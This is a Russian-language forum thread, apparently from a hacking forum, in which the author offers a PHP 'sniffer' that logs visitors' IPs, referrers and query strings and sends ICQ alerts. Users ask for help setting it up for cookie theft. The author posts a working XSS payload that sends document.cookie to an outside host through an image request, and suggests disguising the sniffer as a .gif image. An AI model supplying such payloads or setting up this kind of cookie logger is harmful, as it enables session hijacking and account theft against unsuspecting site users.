Просмотр полной версии : [php] Http сниффер
Developer
28.04.2007, 17:32
Ранее уже как-то писал сниффер, но так и не доходили руки организовать ICQ уведомления.
В общем, кратко о скрипте:
+ Сниффер находится в одном файле (может работать не зависимо от других файлов)
+ Возможность вывода изображения
+ Возможность уведомления по E-Mail (Используется функция mail)
+ Возможность просмотра логов (sniffer.php?go=view)
+ Возможность уведомления по ICQ (Интеграция с классом WebIcqPro. Работает только на PHP5)
В архиве вы найдете файлы:
+ sniffer.php (сниффер)
+ WebIcqPro.class.php (Расширение для работы с ICQ от стороннего разработчика)
+ mygif.gif (Картинка для вывода)
+ log.txt (Лог-файл)
Перед тем, как заливать файл на сервер, откройте файл sniffer.php и отредактируйте мини-конфиг в начале файла ;)
http://slil.ru/24304415
Password: antichat
Developer
28.04.2007, 17:37
Сообщения по ICQ приходят в таком виде:
[DD.MM.YYYY HH:II:SS] The new query on sniffer has arrived
TIME<|>PROXYIP<|>REALIP<|>PORT<|>REFERER<|>BROWSER<|>QUERY
ЗЫ: Можно написать .htaccess и положить его в папку с сниффером, для того чтобы можно было обращаться к снифферу на ".../sniffer.php", а ".../cool.gif".
grozglaz
29.04.2007, 07:59
Я скачал архив, на каком хосте выложеть не в курсе???
З.Ы Если WebIcqPro.class.php удалить, сниф работать будет??
Работает как часы (китайские) :)
grozglaz
29.04.2007, 08:42
Када открываешь снифер, там текст вылазиет.
Объясните на пальцах, как chmode поставить, как писать и куда. ПлиZZZ
Developer
29.04.2007, 09:28
Для работы необходимо залить только один файл на хост - sniffer.php. Лог-файл должен создаваться сам (Но для больших гарантий лучше его все-таки залить в ручную и поставить права 777).
Если изображение, указанное в конфиги не найдено - оно грузиться не будет, просто будет пустая страничка.
Если файл WebICQPro не найден - уведомления по ICQ рассылаться не будут.
Када открываешь снифер, там текст вылазиет.
Какой текст? При запросе на сниффер либо картинка либо ничего вообще.
Но если прописать в адресной строке .../sniffer.php?go=view, то откроется лог файл. Там данным пишутся в следующем формате:
TIME<|>PROXYIP<|>REALIP<|>PORT<|>REFERER<|>BROWSER<|>QUERY
grozglaz
29.04.2007, 10:51
http://logsnif.narod.ru/sniffer.php я на народ кинул, но php вроде он не держит.
куда его кунуть?? На какой хост, дай адресс
grozglaz
29.04.2007, 13:00
Фсёёё Работает, а как сделать что бы куки сохранял тоже, оч надо. Молодца!!
Чтобы снифер сохранял куки, нужно найти Xss на сайте, с которого кукис надо. Почитай статьи, иначе ничего не поймешь...
grozglaz
29.04.2007, 14:14
Я в курсе про Хss, в сниффере просто функции куки сохранять нет
Попробовал ваш сниффер поставить но не удачно....что то он не отображает данные :mad: Конфиг я менял точнее файл sniffer.php В чём может быть проблема??
grozglaz
29.04.2007, 14:57
У мя всё работае, поменяй тока е маил, и всё, размести на хосте где php работает. У мя тоже с начало не получилось, а ща ок.
З.Ы Добавь куки, плиZZZ
Developer
29.04.2007, 20:03
Причем тут куки? :) Куки нада передовать в строку запроса.
grozglaz
30.04.2007, 03:26
Ну можно же вставить скрипт, найти Хss вставить ссылку на форуме, и куки записываются в лог.
Developer
05.05.2007, 22:03
XSS на отправку кукиксов пишется примерно так:
<script>img = new Image(); img.src = "http://mysite.com/sniffer.gif?" + document.cookie;</script>
Developer
05.05.2007, 22:04
Докажи, что бывают ситуации, что нужно записать в файл $_cookie и я добавлю эту опцию :)))
Developer
10.05.2007, 20:47
Ммм.. А если фреймом открыть, куки будут видны?
Up
перезалейте плз, немогу скачать
Developer
11.05.2007, 19:23
Кто скачал, пусть перезальет, а то я куда-то удалил наработки :)
Пожалуйста перезалете это сниффер...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot